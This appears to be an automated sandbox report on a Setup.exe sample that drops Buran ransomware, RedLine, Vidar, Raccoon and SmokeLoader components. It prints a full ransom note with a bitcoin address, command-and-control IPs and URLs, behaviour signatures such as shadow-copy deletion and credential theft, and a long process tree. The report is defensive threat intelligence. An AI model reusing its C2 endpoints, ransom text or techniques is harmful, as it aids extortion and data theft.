Resubmissions
03/09/2021, 12:16
210903-pfn3ysdac4 1003/09/2021, 04:55
210903-fj6mqsfbfk 1002/09/2021, 19:23
210902-x37sksbef5 1002/09/2021, 15:02
210902-senycadeck 1002/09/2021, 11:29
210902-4b2x2c3ahj 1002/09/2021, 05:46
210902-lng5vcn31n 1002/09/2021, 04:57
210902-gp7zs88ann 1001/09/2021, 17:32
210901-sgcvvtysvs 1031/08/2021, 12:57
210831-1v8aywj16x 1031/08/2021, 07:34
210831-n7h9w45r3x 10Analysis
-
max time kernel
1799s -
max time network
1808s -
platform
windows11_x64 -
resource
win11 -
submitted
31/08/2021, 12:57
General
-
Target
Setup.exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Score
10/10
Malware Config
Extracted
Path
C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Family
buran
Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
PAY FAST 500$=0.013 btc
or the price will increase tomorrow
bitcoin address
bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8
To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free.
But this file should be of not valuable!
Do you really want to restore your files?
[email protected]
TELEGRAM @ payfast290
Your personal ID: 194-74C-B8E
Attention!
* Do not rename encrypted files.
* Do not try to decrypt your data using third party software, it may cause permanent data loss.
* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Extracted
Family
redline
Botnet
mybirja
C2
45.14.49.232:63850
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
redline
Botnet
1
C2
37.0.8.88:44263
Extracted
Family
smokeloader
Version
2020
C2
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
rc4.i32
rc4.i32
Signatures
-
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 1 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 26 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 64 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 3 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 3 IoCs
-
Obfuscated with Agile.Net obfuscator 2 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 8 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 4 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 64 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 10 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 64 IoCs
-
Checks SCSI registry key(s) 3 TTPs 7 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 64 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 49 IoCs
-
Modifies registry class 8 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 19 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 8 IoCs
-
Suspicious use of SendNotifyMessage 63 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\AKAaEBEXeHWvBCq4njjkRihn.exe"C:\Users\Admin\Documents\AKAaEBEXeHWvBCq4njjkRihn.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe"C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
- Suspicious use of SetThreadContext
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
- Suspicious use of SetThreadContext
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5188 -s 284⤵
- Program crash
- Checks processor information in registry
-
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
- Enumerates system info in registry
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6156 -s 284⤵
- Program crash
- Checks processor information in registry
-
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8528 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6116 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
